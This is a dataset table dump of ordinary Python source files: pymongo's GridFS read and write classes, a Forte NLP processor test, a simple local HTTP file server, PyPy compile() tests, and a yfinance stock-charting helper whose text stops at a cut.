max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
gridfs/grid_file.py | naomielst/mongo-python-driver | 2 | 5500 | # Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tools for representing files stored in GridFS."""
import datetime
import io
import math
import os
from bson.int64 import Int64
from bson.son import SON
from bson.binary import Binary
from bson.objectid import ObjectId
from pymongo import ASCENDING
from pymongo.collection import Collection
from pymongo.cursor import Cursor
from pymongo.errors import (ConfigurationError,
CursorNotFound,
DuplicateKeyError,
InvalidOperation,
OperationFailure)
from pymongo.read_preferences import ReadPreference
from gridfs.errors import CorruptGridFile, FileExists, NoFile
try:
_SEEK_SET = os.SEEK_SET
_SEEK_CUR = os.SEEK_CUR
_SEEK_END = os.SEEK_END
# before 2.5
except AttributeError:
_SEEK_SET = 0
_SEEK_CUR = 1
_SEEK_END = 2
EMPTY = b""
NEWLN = b"\n"
"""Default chunk size, in bytes."""
# Slightly under a power of 2, to work well with server's record allocations.
DEFAULT_CHUNK_SIZE = 255 * 1024
_C_INDEX = SON([("files_id", ASCENDING), ("n", ASCENDING)])
_F_INDEX = SON([("filename", ASCENDING), ("uploadDate", ASCENDING)])
def _grid_in_property(field_name, docstring, read_only=False,
closed_only=False):
"""Create a GridIn property."""
def getter(self):
if closed_only and not self._closed:
raise AttributeError("can only get %r on a closed file" %
field_name)
# Protect against PHP-237
if field_name == 'length':
return self._file.get(field_name, 0)
return self._file.get(field_name, None)
def setter(self, value):
if self._closed:
self._coll.files.update_one({"_id": self._file["_id"]},
{"$set": {field_name: value}})
self._file[field_name] = value
if read_only:
docstring += "\n\nThis attribute is read-only."
elif closed_only:
docstring = "%s\n\n%s" % (docstring, "This attribute is read-only and "
"can only be read after :meth:`close` "
"has been called.")
if not read_only and not closed_only:
return property(getter, setter, doc=docstring)
return property(getter, doc=docstring)
def _grid_out_property(field_name, docstring):
"""Create a GridOut property."""
def getter(self):
self._ensure_file()
# Protect against PHP-237
if field_name == 'length':
return self._file.get(field_name, 0)
return self._file.get(field_name, None)
docstring += "\n\nThis attribute is read-only."
return property(getter, doc=docstring)
def _clear_entity_type_registry(entity, **kwargs):
"""Clear the given database/collection object's type registry."""
codecopts = entity.codec_options.with_options(type_registry=None)
return entity.with_options(codec_options=codecopts, **kwargs)
def _disallow_transactions(session):
if session and session.in_transaction:
raise InvalidOperation(
'GridFS does not support multi-document transactions')
class GridIn(object):
"""Class to write data to GridFS.
"""
def __init__(self, root_collection, session=None, **kwargs):
"""Write a file to GridFS
Application developers should generally not need to
instantiate this class directly - instead see the methods
provided by :class:`~gridfs.GridFS`.
Raises :class:`TypeError` if `root_collection` is not an
instance of :class:`~pymongo.collection.Collection`.
Any of the file level options specified in the `GridFS Spec
<http://dochub.mongodb.org/core/gridfsspec>`_ may be passed as
keyword arguments. Any additional keyword arguments will be
set as additional fields on the file document. Valid keyword
arguments include:
- ``"_id"``: unique ID for this file (default:
:class:`~bson.objectid.ObjectId`) - this ``"_id"`` must
not have already been used for another file
- ``"filename"``: human name for the file
- ``"contentType"`` or ``"content_type"``: valid mime-type
for the file
- ``"chunkSize"`` or ``"chunk_size"``: size of each of the
chunks, in bytes (default: 255 kb)
- ``"encoding"``: encoding used for this file. Any :class:`str`
that is written to the file will be converted to :class:`bytes`.
:Parameters:
- `root_collection`: root collection to write to
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` to use for all
commands
- `**kwargs` (optional): file level options (see above)
.. versionchanged:: 4.0
Removed the `disable_md5` parameter. See
:ref:`removed-gridfs-checksum` for details.
.. versionchanged:: 3.7
Added the `disable_md5` parameter.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.0
`root_collection` must use an acknowledged
:attr:`~pymongo.collection.Collection.write_concern`
"""
if not isinstance(root_collection, Collection):
raise TypeError("root_collection must be an "
"instance of Collection")
if not root_collection.write_concern.acknowledged:
raise ConfigurationError('root_collection must use '
'acknowledged write_concern')
_disallow_transactions(session)
# Handle alternative naming
if "content_type" in kwargs:
kwargs["contentType"] = kwargs.pop("content_type")
if "chunk_size" in kwargs:
kwargs["chunkSize"] = kwargs.pop("chunk_size")
coll = _clear_entity_type_registry(
root_collection, read_preference=ReadPreference.PRIMARY)
# Defaults
kwargs["_id"] = kwargs.get("_id", ObjectId())
kwargs["chunkSize"] = kwargs.get("chunkSize", DEFAULT_CHUNK_SIZE)
object.__setattr__(self, "_session", session)
object.__setattr__(self, "_coll", coll)
object.__setattr__(self, "_chunks", coll.chunks)
object.__setattr__(self, "_file", kwargs)
object.__setattr__(self, "_buffer", io.BytesIO())
object.__setattr__(self, "_position", 0)
object.__setattr__(self, "_chunk_number", 0)
object.__setattr__(self, "_closed", False)
object.__setattr__(self, "_ensured_index", False)
def __create_index(self, collection, index_key, unique):
doc = collection.find_one(projection={"_id": 1}, session=self._session)
if doc is None:
try:
index_keys = [index_spec['key'] for index_spec in
collection.list_indexes(session=self._session)]
except OperationFailure:
index_keys = []
if index_key not in index_keys:
collection.create_index(
index_key.items(), unique=unique, session=self._session)
def __ensure_indexes(self):
if not object.__getattribute__(self, "_ensured_index"):
_disallow_transactions(self._session)
self.__create_index(self._coll.files, _F_INDEX, False)
self.__create_index(self._coll.chunks, _C_INDEX, True)
object.__setattr__(self, "_ensured_index", True)
def abort(self):
"""Remove all chunks/files that may have been uploaded and close.
"""
self._coll.chunks.delete_many(
{"files_id": self._file['_id']}, session=self._session)
self._coll.files.delete_one(
{"_id": self._file['_id']}, session=self._session)
object.__setattr__(self, "_closed", True)
@property
def closed(self):
"""Is this file closed?
"""
return self._closed
_id = _grid_in_property("_id", "The ``'_id'`` value for this file.",
read_only=True)
filename = _grid_in_property("filename", "Name of this file.")
name = _grid_in_property("filename", "Alias for `filename`.")
content_type = _grid_in_property("contentType", "Mime-type for this file.")
length = _grid_in_property("length", "Length (in bytes) of this file.",
closed_only=True)
chunk_size = _grid_in_property("chunkSize", "Chunk size for this file.",
read_only=True)
upload_date = _grid_in_property("uploadDate",
"Date that this file was uploaded.",
closed_only=True)
md5 = _grid_in_property("md5", "MD5 of the contents of this file "
"if an md5 sum was created.",
closed_only=True)
def __getattr__(self, name):
if name in self._file:
return self._file[name]
raise AttributeError("GridIn object has no attribute '%s'" % name)
def __setattr__(self, name, value):
# For properties of this instance like _buffer, or descriptors set on
# the class like filename, use regular __setattr__
if name in self.__dict__ or name in self.__class__.__dict__:
object.__setattr__(self, name, value)
else:
# All other attributes are part of the document in db.fs.files.
# Store them to be sent to server on close() or if closed, send
# them now.
self._file[name] = value
if self._closed:
self._coll.files.update_one({"_id": self._file["_id"]},
{"$set": {name: value}})
def __flush_data(self, data):
"""Flush `data` to a chunk.
"""
self.__ensure_indexes()
if not data:
return
assert(len(data) <= self.chunk_size)
chunk = {"files_id": self._file["_id"],
"n": self._chunk_number,
"data": Binary(data)}
try:
self._chunks.insert_one(chunk, session=self._session)
except DuplicateKeyError:
self._raise_file_exists(self._file['_id'])
self._chunk_number += 1
self._position += len(data)
def __flush_buffer(self):
"""Flush the buffer contents out to a chunk.
"""
self.__flush_data(self._buffer.getvalue())
self._buffer.close()
self._buffer = io.BytesIO()
def __flush(self):
"""Flush the file to the database.
"""
try:
self.__flush_buffer()
# The GridFS spec says length SHOULD be an Int64.
self._file["length"] = Int64(self._position)
self._file["uploadDate"] = datetime.datetime.utcnow()
return self._coll.files.insert_one(
self._file, session=self._session)
except DuplicateKeyError:
self._raise_file_exists(self._id)
def _raise_file_exists(self, file_id):
"""Raise a FileExists exception for the given file_id."""
raise FileExists("file with _id %r already exists" % file_id)
def close(self):
"""Flush the file and close it.
A closed file cannot be written any more. Calling
:meth:`close` more than once is allowed.
"""
if not self._closed:
self.__flush()
object.__setattr__(self, "_closed", True)
def read(self, size=-1):
raise io.UnsupportedOperation('read')
def readable(self):
return False
def seekable(self):
return False
def write(self, data):
"""Write data to the file. There is no return value.
`data` can be either a string of bytes or a file-like object
(implementing :meth:`read`). If the file has an
:attr:`encoding` attribute, `data` can also be a
:class:`str` instance, which will be encoded as
:attr:`encoding` before being written.
Due to buffering, the data may not actually be written to the
database until the :meth:`close` method is called. Raises
:class:`ValueError` if this file is already closed. Raises
:class:`TypeError` if `data` is not an instance of
:class:`bytes`, a file-like object, or an instance of :class:`str`.
Unicode data is only allowed if the file has an :attr:`encoding`
attribute.
:Parameters:
- `data`: string of bytes or file-like object to be written
to the file
"""
if self._closed:
raise ValueError("cannot write to a closed file")
try:
# file-like
read = data.read
except AttributeError:
# string
if not isinstance(data, (str, bytes)):
raise TypeError("can only write strings or file-like objects")
if isinstance(data, str):
try:
data = data.encode(self.encoding)
except AttributeError:
raise TypeError("must specify an encoding for file in "
"order to write str")
read = io.BytesIO(data).read
if self._buffer.tell() > 0:
# Make sure to flush only when _buffer is complete
space = self.chunk_size - self._buffer.tell()
if space:
try:
to_write = read(space)
except:
self.abort()
raise
self._buffer.write(to_write)
if len(to_write) < space:
return # EOF or incomplete
self.__flush_buffer()
to_write = read(self.chunk_size)
while to_write and len(to_write) == self.chunk_size:
self.__flush_data(to_write)
to_write = read(self.chunk_size)
self._buffer.write(to_write)
def writelines(self, sequence):
"""Write a sequence of strings to the file.
Does not add seperators.
"""
for line in sequence:
self.write(line)
def writeable(self):
return True
def __enter__(self):
"""Support for the context manager protocol.
"""
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Support for the context manager protocol.
Close the file and allow exceptions to propagate.
"""
self.close()
# propagate exceptions
return False
class GridOut(io.IOBase):
"""Class to read data out of GridFS.
"""
def __init__(self, root_collection, file_id=None, file_document=None,
session=None):
"""Read a file from GridFS
Application developers should generally not need to
instantiate this class directly - instead see the methods
provided by :class:`~gridfs.GridFS`.
Either `file_id` or `file_document` must be specified,
`file_document` will be given priority if present. Raises
:class:`TypeError` if `root_collection` is not an instance of
:class:`~pymongo.collection.Collection`.
:Parameters:
- `root_collection`: root collection to read from
- `file_id` (optional): value of ``"_id"`` for the file to read
- `file_document` (optional): file document from
`root_collection.files`
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` to use for all
commands
.. versionchanged:: 3.8
For better performance and to better follow the GridFS spec,
:class:`GridOut` now uses a single cursor to read all the chunks in
the file.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.0
Creating a GridOut does not immediately retrieve the file metadata
from the server. Metadata is fetched when first needed.
"""
if not isinstance(root_collection, Collection):
raise TypeError("root_collection must be an "
"instance of Collection")
_disallow_transactions(session)
root_collection = _clear_entity_type_registry(root_collection)
super().__init__()
self.__chunks = root_collection.chunks
self.__files = root_collection.files
self.__file_id = file_id
self.__buffer = EMPTY
self.__chunk_iter = None
self.__position = 0
self._file = file_document
self._session = session
_id = _grid_out_property("_id", "The ``'_id'`` value for this file.")
filename = _grid_out_property("filename", "Name of this file.")
name = _grid_out_property("filename", "Alias for `filename`.")
content_type = _grid_out_property("contentType", "Mime-type for this file.")
length = _grid_out_property("length", "Length (in bytes) of this file.")
chunk_size = _grid_out_property("chunkSize", "Chunk size for this file.")
upload_date = _grid_out_property("uploadDate",
"Date that this file was first uploaded.")
aliases = _grid_out_property("aliases", "List of aliases for this file.")
metadata = _grid_out_property("metadata", "Metadata attached to this file.")
md5 = _grid_out_property("md5", "MD5 of the contents of this file "
"if an md5 sum was created.")
def _ensure_file(self):
if not self._file:
_disallow_transactions(self._session)
self._file = self.__files.find_one({"_id": self.__file_id},
session=self._session)
if not self._file:
raise NoFile("no file in gridfs collection %r with _id %r" %
(self.__files, self.__file_id))
def __getattr__(self, name):
self._ensure_file()
if name in self._file:
return self._file[name]
raise AttributeError("GridOut object has no attribute '%s'" % name)
def readable(self):
return True
def readchunk(self):
"""Reads a chunk at a time. If the current position is within a
chunk the remainder of the chunk is returned.
"""
received = len(self.__buffer)
chunk_data = EMPTY
chunk_size = int(self.chunk_size)
if received > 0:
chunk_data = self.__buffer
elif self.__position < int(self.length):
chunk_number = int((received + self.__position) / chunk_size)
if self.__chunk_iter is None:
self.__chunk_iter = _GridOutChunkIterator(
self, self.__chunks, self._session, chunk_number)
chunk = self.__chunk_iter.next()
chunk_data = chunk["data"][self.__position % chunk_size:]
if not chunk_data:
raise CorruptGridFile("truncated chunk")
self.__position += len(chunk_data)
self.__buffer = EMPTY
return chunk_data
def read(self, size=-1):
"""Read at most `size` bytes from the file (less if there
isn't enough data).
The bytes are returned as an instance of :class:`str` (:class:`bytes`
in python 3). If `size` is negative or omitted all data is read.
:Parameters:
- `size` (optional): the number of bytes to read
.. versionchanged:: 3.8
This method now only checks for extra chunks after reading the
entire file. Previously, this method would check for extra chunks
on every call.
"""
self._ensure_file()
remainder = int(self.length) - self.__position
if size < 0 or size > remainder:
size = remainder
if size == 0:
return EMPTY
received = 0
data = io.BytesIO()
while received < size:
chunk_data = self.readchunk()
received += len(chunk_data)
data.write(chunk_data)
# Detect extra chunks after reading the entire file.
if size == remainder and self.__chunk_iter:
try:
self.__chunk_iter.next()
except StopIteration:
pass
self.__position -= received - size
# Return 'size' bytes and store the rest.
data.seek(size)
self.__buffer = data.read()
data.seek(0)
return data.read(size)
def readline(self, size=-1):
"""Read one line or up to `size` bytes from the file.
:Parameters:
- `size` (optional): the maximum number of bytes to read
"""
remainder = int(self.length) - self.__position
if size < 0 or size > remainder:
size = remainder
if size == 0:
return EMPTY
received = 0
data = io.BytesIO()
while received < size:
chunk_data = self.readchunk()
pos = chunk_data.find(NEWLN, 0, size)
if pos != -1:
size = received + pos + 1
received += len(chunk_data)
data.write(chunk_data)
if pos != -1:
break
self.__position -= received - size
# Return 'size' bytes and store the rest.
data.seek(size)
self.__buffer = data.read()
data.seek(0)
return data.read(size)
def tell(self):
"""Return the current position of this file.
"""
return self.__position
def seek(self, pos, whence=_SEEK_SET):
"""Set the current position of this file.
:Parameters:
- `pos`: the position (or offset if using relative
positioning) to seek to
- `whence` (optional): where to seek
from. :attr:`os.SEEK_SET` (``0``) for absolute file
positioning, :attr:`os.SEEK_CUR` (``1``) to seek relative
to the current position, :attr:`os.SEEK_END` (``2``) to
seek relative to the file's end.
"""
if whence == _SEEK_SET:
new_pos = pos
elif whence == _SEEK_CUR:
new_pos = self.__position + pos
elif whence == _SEEK_END:
new_pos = int(self.length) + pos
else:
raise IOError(22, "Invalid value for `whence`")
if new_pos < 0:
raise IOError(22, "Invalid value for `pos` - must be positive")
# Optimization, continue using the same buffer and chunk iterator.
if new_pos == self.__position:
return
self.__position = new_pos
self.__buffer = EMPTY
if self.__chunk_iter:
self.__chunk_iter.close()
self.__chunk_iter = None
def seekable(self):
return True
def __iter__(self):
"""Return an iterator over all of this file's data.
The iterator will return lines (delimited by ``b'\\n'``) of
:class:`bytes`. This can be useful when serving files
using a webserver that handles such an iterator efficiently.
.. versionchanged:: 3.8
The iterator now raises :class:`CorruptGridFile` when encountering
any truncated, missing, or extra chunk in a file. The previous
behavior was to only raise :class:`CorruptGridFile` on a missing
chunk.
.. versionchanged:: 4.0
The iterator now iterates over *lines* in the file, instead
of chunks, to conform to the base class :py:class:`io.IOBase`.
Use :meth:`GridOut.readchunk` to read chunk by chunk instead
of line by line.
"""
return self
def close(self):
"""Make GridOut more generically file-like."""
if self.__chunk_iter:
self.__chunk_iter.close()
self.__chunk_iter = None
super().close()
def write(self, value):
raise io.UnsupportedOperation('write')
def writelines(self, lines):
raise io.UnsupportedOperation('writelines')
def writable(self):
return False
def __enter__(self):
"""Makes it possible to use :class:`GridOut` files
with the context manager protocol.
"""
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Makes it possible to use :class:`GridOut` files
with the context manager protocol.
"""
self.close()
return False
def fileno(self):
raise io.UnsupportedOperation('fileno')
def flush(self):
# GridOut is read-only, so flush does nothing.
pass
def isatty(self):
return False
def truncate(self, size=None):
# See https://docs.python.org/3/library/io.html#io.IOBase.writable
# for why truncate has to raise.
raise io.UnsupportedOperation('truncate')
# Override IOBase.__del__ otherwise it will lead to __getattr__ on
# __IOBase_closed which calls _ensure_file and potentially performs I/O.
# We cannot do I/O in __del__ since it can lead to a deadlock.
def __del__(self):
pass
class _GridOutChunkIterator(object):
"""Iterates over a file's chunks using a single cursor.
Raises CorruptGridFile when encountering any truncated, missing, or extra
chunk in a file.
"""
def __init__(self, grid_out, chunks, session, next_chunk):
self._id = grid_out._id
self._chunk_size = int(grid_out.chunk_size)
self._length = int(grid_out.length)
self._chunks = chunks
self._session = session
self._next_chunk = next_chunk
self._num_chunks = math.ceil(float(self._length) / self._chunk_size)
self._cursor = None
def expected_chunk_length(self, chunk_n):
if chunk_n < self._num_chunks - 1:
return self._chunk_size
return self._length - (self._chunk_size * (self._num_chunks - 1))
def __iter__(self):
return self
def _create_cursor(self):
filter = {"files_id": self._id}
if self._next_chunk > 0:
filter["n"] = {"$gte": self._next_chunk}
_disallow_transactions(self._session)
self._cursor = self._chunks.find(filter, sort=[("n", 1)],
session=self._session)
def _next_with_retry(self):
"""Return the next chunk and retry once on CursorNotFound.
We retry on CursorNotFound to maintain backwards compatibility in
cases where two calls to read occur more than 10 minutes apart (the
server's default cursor timeout).
"""
if self._cursor is None:
self._create_cursor()
try:
return self._cursor.next()
except CursorNotFound:
self._cursor.close()
self._create_cursor()
return self._cursor.next()
def next(self):
try:
chunk = self._next_with_retry()
except StopIteration:
if self._next_chunk >= self._num_chunks:
raise
raise CorruptGridFile("no chunk #%d" % self._next_chunk)
if chunk["n"] != self._next_chunk:
self.close()
raise CorruptGridFile(
"Missing chunk: expected chunk #%d but found "
"chunk with n=%d" % (self._next_chunk, chunk["n"]))
if chunk["n"] >= self._num_chunks:
# According to spec, ignore extra chunks if they are empty.
if len(chunk["data"]):
self.close()
raise CorruptGridFile(
"Extra chunk found: expected %d chunks but found "
"chunk with n=%d" % (self._num_chunks, chunk["n"]))
expected_length = self.expected_chunk_length(chunk["n"])
if len(chunk["data"]) != expected_length:
self.close()
raise CorruptGridFile(
"truncated chunk #%d: expected chunk length to be %d but "
"found chunk with length %d" % (
chunk["n"], expected_length, len(chunk["data"])))
self._next_chunk += 1
return chunk
__next__ = next
def close(self):
if self._cursor:
self._cursor.close()
self._cursor = None
class GridOutIterator(object):
def __init__(self, grid_out, chunks, session):
self.__chunk_iter = _GridOutChunkIterator(grid_out, chunks, session, 0)
def __iter__(self):
return self
def next(self):
chunk = self.__chunk_iter.next()
return bytes(chunk["data"])
__next__ = next
class GridOutCursor(Cursor):
"""A cursor / iterator for returning GridOut objects as the result
of an arbitrary query against the GridFS files collection.
"""
def __init__(self, collection, filter=None, skip=0, limit=0,
no_cursor_timeout=False, sort=None, batch_size=0,
session=None):
"""Create a new cursor, similar to the normal
:class:`~pymongo.cursor.Cursor`.
Should not be called directly by application developers - see
the :class:`~gridfs.GridFS` method :meth:`~gridfs.GridFS.find` instead.
.. versionadded 2.7
.. seealso:: The MongoDB documentation on `cursors <https://dochub.mongodb.org/core/cursors>`_.
"""
_disallow_transactions(session)
collection = _clear_entity_type_registry(collection)
# Hold on to the base "fs" collection to create GridOut objects later.
self.__root_collection = collection
super(GridOutCursor, self).__init__(
collection.files, filter, skip=skip, limit=limit,
no_cursor_timeout=no_cursor_timeout, sort=sort,
batch_size=batch_size, session=session)
def next(self):
"""Get next GridOut object from cursor.
"""
_disallow_transactions(self.session)
# Work around "super is not iterable" issue in Python 3.x
next_file = super(GridOutCursor, self).next()
return GridOut(self.__root_collection, file_document=next_file,
session=self.session)
__next__ = next
def add_option(self, *args, **kwargs):
raise NotImplementedError("Method does not exist for GridOutCursor")
def remove_option(self, *args, **kwargs):
raise NotImplementedError("Method does not exist for GridOutCursor")
def _clone_base(self, session):
"""Creates an empty GridOutCursor for information to be copied into.
"""
return GridOutCursor(self.__root_collection, session=session)
| 2.1875 | 2 |
forte/processors/tests/stanfordnlp_processor_test.py | tcl326/forte | 0 | 5501 | """This module tests Stanford NLP processors."""
import os
import unittest
from texar.torch import HParams
from forte.pipeline import Pipeline
from forte.data.readers import StringReader
from forte.processors.stanfordnlp_processor import StandfordNLPProcessor
from ft.onto.base_ontology import Token, Sentence
class TestStanfordNLPProcessor(unittest.TestCase):
def setUp(self):
self.stanford_nlp = Pipeline()
self.stanford_nlp.set_reader(StringReader())
models_path = os.getcwd()
config = HParams({
"processors": "tokenize",
"lang": "en",
# Language code for the language to build the Pipeline
"use_gpu": False
}, StandfordNLPProcessor.default_hparams())
self.stanford_nlp.add_processor(StandfordNLPProcessor(models_path),
config=config)
self.stanford_nlp.initialize()
# TODO
@unittest.skip("We need to test this without needing to download models "
"everytime")
def test_stanford_processor(self):
sentences = ["This tool is called Forte.",
"The goal of this project to help you build NLP "
"pipelines.",
"NLP has never been made this easy before."]
document = ' '.join(sentences)
pack = self.stanford_nlp.process(document)
print(pack)
| 2.65625 | 3 |
src/serve_files.py | eventh/m3u8looper | 0 | 5502 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Serve current folder files in a HTTP webserver.
"""
import socketserver
from threading import Thread
from http.server import SimpleHTTPRequestHandler
PORT = 8000
def start_http_server(port=PORT):
httpd = socketserver.TCPServer(("", port), SimpleHTTPRequestHandler)
thread = Thread(target = httpd.serve_forever)
thread.start()
return thread
if __name__ == '__main__':
thread = start_http_server()
thread.join()
| 2.90625 | 3 |
pypy/module/__builtin__/test/test_compile.py | yxzoro/pypy | 0 | 5503 | # coding: utf-8
class AppTestCompile:
def test_simple(self):
import sys
co = compile('1+2', '?', 'eval')
assert eval(co) == 3
co = compile(memoryview(b'1+2'), '?', 'eval')
assert eval(co) == 3
exc = raises(ValueError, compile, chr(0), '?', 'eval')
assert str(exc.value) == "source code string cannot contain null bytes"
compile("from __future__ import with_statement", "<test>", "exec")
raises(SyntaxError, compile, '-', '?', 'eval')
raises(SyntaxError, compile, '"\\xt"', '?', 'eval')
raises(ValueError, compile, '1+2', '?', 'maybenot')
raises(ValueError, compile, "\n", "<string>", "exec", 0xff)
raises(TypeError, compile, '1+2', 12, 34)
def test_error_message(self):
import re
compile('# -*- coding: iso-8859-15 -*-\n', 'dummy', 'exec')
compile(b'\xef\xbb\xbf\n', 'dummy', 'exec')
compile(b'\xef\xbb\xbf# -*- coding: utf-8 -*-\n', 'dummy', 'exec')
exc = raises(SyntaxError, compile,
b'# -*- coding: fake -*-\n', 'dummy', 'exec')
assert 'fake' in str(exc.value)
exc = raises(SyntaxError, compile,
b'\xef\xbb\xbf# -*- coding: iso-8859-15 -*-\n', 'dummy', 'exec')
assert 'iso-8859-15' in str(exc.value)
assert 'BOM' in str(exc.value)
exc = raises(SyntaxError, compile,
b'\xef\xbb\xbf# -*- coding: fake -*-\n', 'dummy', 'exec')
assert 'fake' in str(exc.value)
assert 'BOM' in str(exc.value)
def test_unicode(self):
try:
compile(u'-', '?', 'eval')
except SyntaxError as e:
assert e.lineno == 1
def test_unicode_encoding(self):
code = "# -*- coding: utf-8 -*-\npass\n"
compile(code, "tmp", "exec")
def test_bytes(self):
code = b"# -*- coding: utf-8 -*-\npass\n"
compile(code, "tmp", "exec")
c = compile(b"# coding: latin1\nfoo = 'caf\xe9'\n", "<string>", "exec")
ns = {}
exec(c, ns)
assert ns['foo'] == 'café'
assert eval(b"# coding: latin1\n'caf\xe9'\n") == 'café'
def test_memoryview(self):
m = memoryview(b'2 + 1')
co = compile(m, 'baz', 'eval')
assert eval(co) == 3
assert eval(m) == 3
ns = {}
exec(memoryview(b'r = 2 + 1'), ns)
assert ns['r'] == 3
def test_recompile_ast(self):
import _ast
# raise exception when node type doesn't match with compile mode
co1 = compile('print(1)', '<string>', 'exec', _ast.PyCF_ONLY_AST)
raises(TypeError, compile, co1, '<ast>', 'eval')
co2 = compile('1+1', '<string>', 'eval', _ast.PyCF_ONLY_AST)
tree = compile(co2, '<ast>', 'eval')
assert compile(co2, '<ast>', 'eval', _ast.PyCF_ONLY_AST) is co2
def test_leading_newlines(self):
src = """
def fn(): pass
"""
co = compile(src, 'mymod', 'exec')
firstlineno = co.co_firstlineno
assert firstlineno == 2
def test_null_bytes(self):
raises(ValueError, compile, '\x00', 'mymod', 'exec', 0)
src = "#abc\x00def\n"
raises(ValueError, compile, src, 'mymod', 'exec')
raises(ValueError, compile, src, 'mymod', 'exec', 0)
def test_null_bytes_flag(self):
try:
from _ast import PyCF_ACCEPT_NULL_BYTES
except ImportError:
skip('PyPy only (requires _ast.PyCF_ACCEPT_NULL_BYTES)')
raises(SyntaxError, compile, '\x00', 'mymod', 'exec',
PyCF_ACCEPT_NULL_BYTES)
src = "#abc\x00def\n"
compile(src, 'mymod', 'exec', PyCF_ACCEPT_NULL_BYTES) # works
def test_compile_regression(self):
"""Clone of the part of the original test that was failing."""
import ast
codestr = '''def f():
"""doc"""
try:
assert False
except AssertionError:
return (True, f.__doc__)
else:
return (False, f.__doc__)
'''
def f(): """doc"""
values = [(-1, __debug__, f.__doc__),
(0, True, 'doc'),
(1, False, 'doc'),
(2, False, None)]
for optval, debugval, docstring in values:
# test both direct compilation and compilation via AST
codeobjs = []
codeobjs.append(
compile(codestr, "<test>", "exec", optimize=optval))
tree = ast.parse(codestr)
codeobjs.append(compile(tree, "<test>", "exec", optimize=optval))
for i, code in enumerate(codeobjs):
print(optval, debugval, docstring, i)
ns = {}
exec(code, ns)
rv = ns['f']()
assert rv == (debugval, docstring)
def test_assert_remove(self):
"""Test removal of the asserts with optimize=1."""
import ast
code = """def f():
assert False
"""
tree = ast.parse(code)
for to_compile in [code, tree]:
compiled = compile(to_compile, "<test>", "exec", optimize=1)
ns = {}
exec(compiled, ns)
ns['f']()
def test_docstring_remove(self):
"""Test removal of docstrings with optimize=2."""
import ast
import marshal
code = """
'module_doc'
def f():
'func_doc'
class C:
'class_doc'
"""
tree = ast.parse(code)
for to_compile in [code, tree]:
compiled = compile(to_compile, "<test>", "exec", optimize=2)
ns = {}
exec(compiled, ns)
assert '__doc__' not in ns
assert ns['f'].__doc__ is None
assert ns['C'].__doc__ is None
# Check that the docstrings are gone from the bytecode and not just
# inaccessible.
marshalled = str(marshal.dumps(compiled))
assert 'module_doc' not in marshalled
assert 'func_doc' not in marshalled
assert 'class_doc' not in marshalled
class TestOptimizeO:
"""Test interaction of -O flag and optimize parameter of compile."""
def setup_method(self, method):
space = self.space
self._sys_debug = space.sys.debug
# imitate -O
space.sys.debug = False
def teardown_method(self, method):
self.space.sys.debug = self._sys_debug
def test_O_optmize_0(self):
"""Test that assert is not ignored if -O flag is set but optimize=0."""
space = self.space
w_res = space.appexec([], """():
assert False # check that our -O imitation hack works
try:
exec(compile('assert False', '', 'exec', optimize=0))
except AssertionError:
return True
else:
return False
""")
assert space.unwrap(w_res)
def test_O_optimize__1(self):
"""Test that assert is ignored with -O and optimize=-1."""
space = self.space
space.appexec([], """():
exec(compile('assert False', '', 'exec', optimize=-1))
""")
# TODO: Check the value of __debug__ inside of the compiled block!
# According to the documentation, it should follow the optimize flag.
# However, cpython3.5.0a0 behaves the same way as PyPy (__debug__ follows
# -O, -OO flags of the interpreter).
| 2.6875 | 3 |
tickers_graphing_module.py | huangbrandon432/Investing-Trading-Tool | 0 | 5504 |
import yfinance as yf
import matplotlib.pyplot as plt
import plotly.express as px
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import pandas as pd
from IPython.display import Markdown
import numpy as np
from datetime import date, timedelta
def plot_and_get_info(ticker, start = None, end = None, ma = 'yes'):
ticker_obj = yf.Ticker(ticker)
ticker_hist = ticker_obj.history(period = 'max')
if start and end:
start_date, end_date = start, end
else:
start_date, end_date = ticker_hist.index[0], ticker_hist.index[-1]
frame = ticker_hist.loc[start_date:end_date]
closing_prices = frame['Close']
volume = frame['Volume']
fig = make_subplots(rows=2, cols=1,
shared_xaxes=True,
vertical_spacing=0.03, row_heights = [0.8, 0.2])
fig.add_trace(go.Scatter(x = closing_prices.index, y = closing_prices, mode = 'lines', name = 'Close'), row = 1, col = 1)
if ma == 'yes':
closing_prices_ma = frame['Close'].rolling(7).mean()
fig.add_trace(go.Scatter(x = closing_prices_ma.index, y = closing_prices_ma, mode = 'lines', name = '7D Close Moving Average'), row = 1, col = 1)
fig.add_trace(go.Bar(x = closing_prices.index, y = volume, name = 'Volume'), row=2, col=1)
fig.update_xaxes(rangeslider_visible = True, rangeslider_thickness = 0.1, row=2, col=1)
fig.update_yaxes(title_text="Price", row=1, col=1)
fig.update_layout(title=ticker, height = 600,
xaxis=dict(
rangeselector=dict(
buttons=list([
dict(count=7,
label="1w",
step="day",
stepmode="backward"),
dict(count=1,
label="1m",
step="month",
stepmode="backward"),
dict(count=3,
label="3m",
step="month",
stepmode="backward"),
dict(count=6,
label="6m",
step="month",
stepmode="backward"),
dict(count=1,
label="YTD",
step="year",
stepmode="todate"),
dict(count=1,
label="1y",
step="year",
stepmode="backward"),
dict(step="all")
])
),
type="date"
)
)
fig.show()
start_price, end_price = frame.iloc[0]['Close'], frame.iloc[-1]['Close']
def printmd(string):
display(Markdown(string))
printmd('Given Timeframe:')
printmd("Return: {:.2f}%".format((end_price - start_price)/start_price*100))
try:
ticker_info = ticker_obj.info
print()
printmd('Business Summary: ' + ticker_info['longBusinessSummary'])
